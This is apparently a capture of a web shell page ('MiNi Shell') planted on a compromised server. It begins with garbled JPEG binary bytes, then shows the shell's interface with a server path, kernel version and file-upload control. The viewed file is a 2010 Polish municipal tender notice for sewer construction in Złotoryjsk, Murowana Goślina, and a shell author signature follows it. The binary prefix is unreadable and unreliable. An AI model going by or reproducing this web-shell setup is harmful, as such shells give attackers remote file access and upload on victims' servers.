JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100622/178630-N-2010.html

<p class="kh_header"><b>Murowana Goślina: Budowa kanalizacji sanitarnej wraz z przyłączami w Złotoryjsku w zakresie ulic Żwirowej i Piaskowej w ramach zadania inwestycyjnego: Budowa sieci wodociągowej rozdzielczej w Głębocku (etap I i II) oraz budowa kanalizacji sanitarnej grawitacyjnej wraz z przyłączami w Złotoryjsku gmina Murowana Goślina</b><br>
<b>Numer ogłoszenia: 178630 - 2010; data zamieszczenia: 22.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murowana Goślina , ul. Poznańska 18, 62-095 Murowana Goślina, woj. wielkopolskie, tel. 061 8923600, 8923601, 8923602, faks 061 8122140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murowana-goslina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej wraz z przyłączami w Złotoryjsku w zakresie ulic Żwirowej i Piaskowej w ramach zadania inwestycyjnego: Budowa sieci wodociągowej rozdzielczej w Głębocku (etap I i II) oraz budowa kanalizacji sanitarnej grawitacyjnej wraz z przyłączami w Złotoryjsku gmina Murowana Goślina.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa kanalizacji sanitarnej wraz z przyłączami w Złotoryjsku w zakresie ulic Żwirowej i Piaskowej w ramach zadania inwestycyjnego: Budowa sieci wodociągowej rozdzielczej w Głębocku (etap I i II) oraz budowa kanalizacji sanitarnej grawitacyjnej wraz z przyłączami w Złotoryjsku gmina Murowana Goślina. Zakres zamówienia obejmuje wykonanie sieci kanalizacji sanitarnej rozdzielczej o średnicy 200mm PVC o łącznej długości 408m i odcinka kanalizacji sanitarnej rozdzielczej o średnicy 160mm PVC o łącznej długości 111m - (I etap zamówienia) oraz przyłączami (5 sztuk) o średnicy 160mm PVC i łącznej długości 18 m do działek: 149/2, 149/11, 149/12, 150/17, 150/15 (II etap zamówienia) w zakresie ulic Żwirowej i Piaskowej w Złotoryjsku gmina Murowana Goślina. 
W zakresie zamówienia uwzględniona jest opłata za odbiór techniczny sieci kanalizacji sanitarnej wraz z przyłączami przez operatora sieci kanalizacji sanitarnej.
Wykaz dokumentacji na podstawie, której należy wykonać kanalizację sanitarną rozdzielczą wraz z przyłączami w Złotoryjsku gmina Murowana Goślina.
(1) projekt sieci kanalizacji sanitarnej wraz z przyłączami w Złotoryjsku
(2) specyfikacja techniczna wykonania i odbioru robót,
(3) przedmiary robót, 
(4) kosztorys ofertowy,
(5) SIWZ,
(6) projekt umowy,
(7) projekt organizacji wykonania inwestycji,
(8) warunki techniczne wykonania i odbioru robót budowlano - montażowych oraz przy zastosowaniu obowiązujących w tej materii przepisów Prawa budowlanego, Norm Polskich, norm technicznych, przepisów sanitarnych, BHP, pożarowych i aktualnej wiedzy technicznej.
1. Obowiązki Wykonawcy.
1.1. W celu prowadzenia inwestycji Wykonawca zobowiązany jest do zabezpieczenia terenu prowadzonych robót oraz dbać o stan techniczny urządzeń oznakowania i prawidłowość oznakowania przez cały czas realizacji zadania. 
1.2. Wykonawca zobowiązany jest do prowadzenia inwestycji w taki sposób aby umożliwić mieszkańcom dojazd do posesji oraz informować mieszkańców oraz inwestora na bieżąco o utrudnieniach. 
1.3. Do obowiązku Wykonawcy należy przygotowanie i montaż (w miejscu wyznaczonym przez Inwestora)  tablicy informacyjnej, na której należy umieścić zakres prowadzonych robót oraz termin realizacji. 
1.4. Wykonawca zobowiązany jest prowadzić roboty zgodnie z przepisami Prawa budowlanego, BHP i P. Poż. i opracować plan zagospodarowania 
placu budowy oraz instrukcję BIOZ. 
1.5. Wykonawca we własnym zakresie wykona zagospodarowanie placu budowy w miarę potrzeb i zgodności z przepisami Prawa budowlanego, przepisów BHP i P. Poż. (zaplecze socjalne, ogrodzenie, przyłącza wodociągowe i energetyczne), instrukcję BIOZ wraz planem zagospodarowania placu budowy. 
1.6. Wykonanie przedmiotu zamówienia nastąpi z materiałów Wykonawcy, 
które  dopuszczone są do obrotu w budownictwie. Zastosowane materiały
muszą posiadać certyfikat zgodności lub deklarację zgodności z Polską Normą lub z aprobatą techniczną.
1.7. Wykonanie prac związanych z obsługą geodezyjną w zakresie przedmiotu zamówienia należy do Wykonawcy robót budowlanych. Wykonawca 
na własny koszt opracuje projekty techniczne organizacji placu budowy 
i montażu obiektu, zorganizuje niezbędne zaplecze budowy zgodnie 
z obowiązującymi przepisami oraz dokona zmiany organizacji ruchu na czas budowy.
1.8. Wykonawca zobowiązany jest ująć wszelkie koszty związane z odbiorami technicznymi wykonanego odcinka sieci kanalizacji sanitarnej wraz z przyłączami, w tym opłaty pobierane przez operatora sieci. Ponadto musi uwzględnić koszty związane z organizacją ruchu, przygotowaniem dróg objazdowych, oznakowaniem robót i objazdów, koszty urządzeń zabezpieczających przed dostępem osób trzecich oraz urządzenie i demontaż placu budowy wraz z zapleczem. Kosztem Wykonawcy jest również przygotowanie w pełnym zakresie obsługi geodezyjnej i opracowanie dokumentacji powykonawczej.
1.9. Po zakończeniu robót Wykonawca zobowiązany jest do likwidacji 
i uporządkowania placu budowy oraz pozostawienie pasa drogowego w stanie określonym w decyzji lokalizacyjnej właściciela drogi.
2. Sposób odbioru wykonanych robót.
2.1. Wykonawca w trakcie wykonywania robót zgłasza wpisem w Dzienniku budowy do odbioru elementy ulegające zakryciu wraz z wymaganymi dokumentami technicznymi dotyczącymi wykonanych robót oraz zastosowanych materiałów.
2.2. Wykonawca na 7 dni przed terminem odbioru końcowego zgłosi inspektorowi nadzoru inwestorskiego zakończenie robót celem sprawdzenia kompletności i prawidłowości złożonych dokumentów odbioru.
2.3. Przystąpienie do odbioru końcowego przedmiotu zamówienia nastąpi w terminie 7 dni od daty potwierdzenia przez inspektora nadzoru zakończenia robót.
2.4. Jeśli w toku czynności odbioru zostaną stwierdzone wady, Wykonawca zobowiązany jest je usunąć i ponownie zgłosić inspektorowi nadzoru inwestorskiego do odbioru.
2.5. Wykonawca zobowiązany jest do dostarczenia zestawienia wykonanych     robót zgodnie z inwentaryzacją geodezyjną powykonawczą. Inwestor wskaże w jakim układzie i jakie dane Wykonawca zobowiązany jest umieścić w zestawieniu. Zestawienie takie będzie dołączone każdorazowo do protokołu odbioru robót częściowych oraz protokołu odbioru końcowego robót.
2.6. Wykonawca przystępując do odbioru przekazuje inwestorowi dokumentację powykonawczą przedmiotu zamówienia wraz z protokołami odbioru, atestami, certyfikatami, aprobatami technicznymi i gwarancjami poszczególnych elementów oraz całości dokonując zgłoszenia w Dzienniku Budowy o przekazaniu inwestorowi wraz z oświadczeniem kierownika budowy, projektanta i inspektora nadzoru inwestorskiego, o którym mowa w art. 57 Prawa budowlanego.
2.7. Przedmiot zamówienia zostanie odebrany przez Inwestora wtedy, gdy Wykonawca przekaże go do odbioru w zgodności z projektem budowlanym wraz z aneksami, wpisami nadzoru autorskiego i obowiązującymi przepisami Prawa budowlanego, Warunkami technicznymi wykonania i odbioru robót budowlano - montażowych, Polskimi Normami, przepisami sanitarnymi, BHP i P. Poż., P.I.P., oraz załączy stosowne protokóły odbioru z poszczególnych faz realizacji oraz końcowy wraz z dokumentacją dotyczącą jakości i dopuszczenia do stosowania materiałów wbudowanych. Na zastosowane urządzenia Wykonawca do odbioru załącza gwarancje wraz dokumentacją techniczną użytkowania i eksploatacji.      
3. Na całość wykonanych prac Wykonawca udzieli 60 miesięcy gwarancji i rękojmii..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.10.00.00-8, 45.11.12.00-0, 45.20.00.00-9, 45.23.00.00-8, 45.23.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 8000,00 zł (słownie: osiem_tysięcy_złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych, wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, potwierdzający wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 robót, których przedmiotem była budowa kanalizacji saniternej o długości minimum 100 mb każda oraz dokumenty potwierdzające, że roboty wpisane do wykazu robót budowlanych zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych, wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności potwierdzający dysponowanie co najmniej 1 osobą, zdolną do wykonania zamówienia posiadającą wymagane przepisami prawa budowlanego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub ważne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji wodociągowych, które zostały wydane na podstawie wcześniej obowiązujących przepisów, dokumenty stwierdzające, że osoby, o których mowa w pkt 9.1) lit. c) SIWZ, posiadają wymagane przepisami Prawa budowlanego uprawnienia we wskazanych specjalnościach: 
(1) decyzja o nadaniu uprawnień 
oraz 
(2) aktualne zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego (zaświadczenie musi być aktualne na dzień składania ofert),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych, zaakceptowanie 30-dniowego terminu płatności w formularzu oferty, opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 200 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>(1) w celu wykazania spełnienia przez oferowane roboty wymagań określonych przez Zamawiającego, Wykonawca na podstawie art. 25 u.p.z.p. składa kosztorys ofertowy wykonany metodą uproszczoną zgodnie z dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót budowlanych oraz przedmiarami,
(2) dowód wniesienia wadium,
(3) dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 
(4) stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany postanowień umowy w zakresie terminu realizacji zamówienia - w przypadku:
- przedłużenia się postępowania przetargowego
- istotnej, leżącej po stronie Zamawiającego, zwłoki w przekazaniu placu budowy Wykonawcy, o ilość dni opóźnienia,
- wystąpienia takich warunków atmosferycznych, które z względów obiektywnych uniemożliwiają wykonanie robót budowlanych zgodnie z specyfikacją istotnych warunków zamówienia,
- wystąpienia awarii nie zawinionej czynnościami lub nie wynikającej z zaniechania czynności, do których Wykonawca był zobowiązany,
- działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia,
- przerwania realizacji zamówienia w sytuacjach określonych w art. 32 ust. 1 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami,
- nieprzewidzianych okoliczności formalno-prawnych
- wystąpienia zmiany zakresu robót,
oraz w stosunku do:
- konieczności zmiany kierownika budowy.
- konieczności wprowadzenia zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla zamawiającego,
- ponadto zmiany terminu wykonania umowy mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności:
- podniesienie sprawności ukończonych robót budowlanych,
- zmiana obowiązujących przepisów,
- podniesienie wydajności urządzeń,
- podniesienie bezpieczeństwa wykonywania robót,
- usprawnienia w trakcie użytkowania obiektu,
- opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez lub dające się przypisać zamawiającemu, personelowi zamawiającego lub innemu wykonawcy zatrudnionemu przez zamawiającego na terenie budowy,
- zaistnienie nieprzewidzianych w umowie warunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo niekorzystnych warunków klimatycznych, klimatycznych także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach,
- siła wyższa,
- wystąpienie robót zamiennych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip2.murowana-goslina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Murowana Goślina
ul. Poznańska 16
pokój nr 32
62-095 Murowana Goślina.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2010 godzina 10:00, miejsce: Urząd Miasta i Gminy Murowana Goślina
ul. Poznańska 18
pokój nr 1 (kancelaria)
62-095 Murowana Goślina.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich: Europa inwestująca w obszary wiejski. Program opracowany przez Gminę Murowana Goślina. Projekt Budowa sieci wodociągowej rozdzielczej w Głębocku (etap I i II) oraz budowa kanalizacji sanitarnej grawitacyjnej wraz z przyłączami w Złotoryjsku, gmina Murowana Goślina współfinansowany ze środków Unii Europejskiej w ramach Osi III Działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013. Instytucja Zarządzająca Programem Rozwoju Obszarów Wiejskich na lata 2007-2013 - Ministerstwo Rolnictwa i Rozwoju Wsi.
Zamawiający nie przewiduje:
a) udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 u.p.z.p.;
b) zawarcia umowy ramowej; 
c) rozliczeń w walucie obcej;
d) przeprowadzenia aukcji elektronicznej;
e) zwrotu kosztów udziału w postępowaniu. Wykonawcy ponoszą wszelkie koszty własne związane z przygotowaniem i złożeniem oferty, niezależnie od wyniku postępowania. Zamawiający w żadnym przypadku nie odpowiada za koszty poniesione przez Wykonawców w związku z przygotowaniem i złożeniem oferty. Wykonawcy zobowiązują się nie podnosić jakichkolwiek roszczeń z tego tytułu względem Zamawiającego, z zastrzeżeniem art. 93 ust. 4 u.p.z.p.,
f) ustanowienia dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com